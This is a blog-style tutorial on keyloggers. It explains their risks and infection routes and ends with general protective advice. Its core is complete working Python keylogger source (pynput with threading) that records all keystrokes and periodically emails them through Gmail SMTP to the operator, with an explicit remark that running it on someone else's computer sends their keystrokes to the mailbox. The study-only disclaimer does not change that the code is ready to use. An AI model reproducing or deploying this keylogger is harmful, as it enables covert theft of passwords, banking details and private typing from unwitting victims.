Keylogger : He knows what you are typing!!
Imagine you are typing something and there is one software or program who keeps track of what you type on your keyboard. It takes a note of each and every key you press and records that data. Now, what if that data got leaked? You can imagine how harmful it is for you and your system. That data may include your social media passwords, your personal information and your banking data. That is how keylogger works.
Keylogger collects the information and send back to a third party. That third party may use that information for any purpose. This is not only one case, what if a keylogger program tries to collect your data like call recording, copy-pasted data, GPS locations, Screen grabs, even a microphone and camera. You can imagine how terrifying a keylogger can be!
Most of the time hackers try to collect the user data using Keylogger. For Example, you installed one third party module and that module may contain keylogging script, so, what keystrokes you type on your keyboard will be recorded and mailed back to the hacker or they could be a man in the middle and keep eye on your keystrokes.
But this is another condition, some of the companies use keylogger and related system for software testing and employee management. This system is called as Corporate Keylogging. The main purpose of Corporate Keylogging is real-time monitoring and Alerting, Investigation of failed systems and Compliance Auditing. This may useful to facilitate user and their issues.
How does keylogger get into our devices and how do they infect the system? Keylogger can be placed into a machine in different ways. Physical loggers are placed in input-output devices like wireless keyboards and touchpads. In 2017, HP laptops were shipped with keylogging code present in touchpad driver. Software based Keylogger is precisely common and has various routes to enter in your system. Malware infected Apps and software, that we install in our system may also contain keylogger script. Google removed 145 apps from a play store which contained keylogger scripts. Hackers set up this keylogger with various programming languages and run it on the target system with various means, like with desktop software, third party module, Cross site scripting, Man in the middle attack, mobile based apps, etc.
After all, “Privacy — like eating and breathing — is one of life’s basic requirements.” By, Katherine Neville
So, following are some steps where we will be trying to study one basic keylogger using python. Some basic python libraries and modules will be used and it is only for study purpose. Another part is, you can run this program on another computer and get the data on that computer to your email. Entire code is available below.
First of all, Object oriented concepts like class and constructors will be needed to implement this thing. Although, we can implement it without using Classes but significant way would be better.
Install the python package ‘pynput’
pip install pynputSome other important libraries are ‘threading’ and ‘smtplib’, which are inbuilt with python2 and python3.
Now import a required packages in file called keylogger.py
import pynput.keyboard as pkimport threadingimport smtplib
Now create a class named Keylogger and initialize the constructor in python along with variables.
class Keylogger: def __init__(self, time_interval,email,password): self.log = "Keylogger Started\n" self.interval = time_interval self.email = email self.password = password
Above, time_interval defines the after how much time in seconds program should mail you about key typed by the target. Time should be between 6 to 10 minutes for better understanding of keystrokes. eg . 120 , 300, 600 seconds.
email and password variables are defined for email where all keystrokes should be mailed and its password. And log is a variable list for appending data of keyboard strokes locally in the program.
Next, We will create in function in the same class for capturing the keystroke on the system.
def process_key_press(self , key): try: current_key = str(key.char) except AttributeError: if key == key.space: current_key= " " else: current_key = " " + str(key) +" " self.append_to_log(current_key)
Keystroke data are passed in variable key , and key.space is value when we enter the spacebar on the keyboard. Current_key is a variable of keys which are pressed throughout the time.
def append_to_log(self, string): self.log = self.log+string
When target enters the keys those key are appended in log variable list after an interval of time and then it become empty again.
def start(self): keyboard_listener = pk.Listener(on_press = self.process_key_press) with keyboard_listener: self.report() keyboard_listener.join()
Here we have created an instance named keyboard_listener and pynput.keyboard module’s on_press method is applied on function process_key_press.
And keyboard_listener we called function report, which in the same class.
def report(self): print(self.log) self.send_mail(self.email, self.password, "\n\n" + self.log) self.log = "" timer = threading.Timer(self.interval,self.report) timer.start()
Here, we used recurssion in a function report to call it after an interval of time. And send_mail function is used to send data of target machine to our mail. This send_mail function send us a data stored in list variable log.
def send_mail(self, email, password, message): server = smtplib.SMTP("smtp.gmail.com", 587) server.starttls() server.login(email, password) server.sendmail(email, email, message) server.quit()
This is send mail function which will execute after some interval of time . Here we have used SMTP server of google and 587 is its port number.
Now we have to create another file name main.py to execute this keylogger.py file as method.
import keylogger my_keylogger = keylogger.Keylogger(120,'yourmail@gmail.com','password_of_mail')my_keylogger.start()
We have imported a file keylogger.py as keylogger here and Keylogger class invoked as method. And we passed time interval, gmail address and its password.
Now, to execute this keylogger ,we’ve to execute the main.py with mentioned interval time, we will get the mails on mentioned mail with data or keystrokes of target machine.
Following is fully executable code, where , First program is keylogger.py and second one is main.py.
NOTE : This is only for study purpose and do not use it in illegal ways.
Now, if this program get executed in someone else computer , then definately it will mail you the keyboard logs of that system on mentioned mail in interval of time
NOTE: If you executed this in your machine then ctrl + C in command promt will not work to stop this code execution for that you have run following command.
1. killall python //for linux with python2
2. killall python3 //for linux with python3
3. taskkill /IM main.py //for windowsSo, the question arises here is, how can we protect from this keyloggers? Before installing any third-party module make sure you read all term and condition of them. Use the Task manager for monitoring resources and processes and data. Observing the resources allocated and background process may helpful for understanding the data flow and transmission. Usually keylogger needs a root access, so there we can capture the keylogging scripts. Using various trusted anti-virus and anti-keylogger software may help for our protection. While baking or privatizing data, using virtual onscreen keyboards is the safest direction. Disabling self-running background apps and setting up a permission while connecting with external devices, may helpful to us to take over the key logging structure and its estimation.
“In the next three years, the value of data will increase, making it even more valuable than it is today. The more efficiently you store your data, the more benefits your business will see.”
― Thomas Harrer
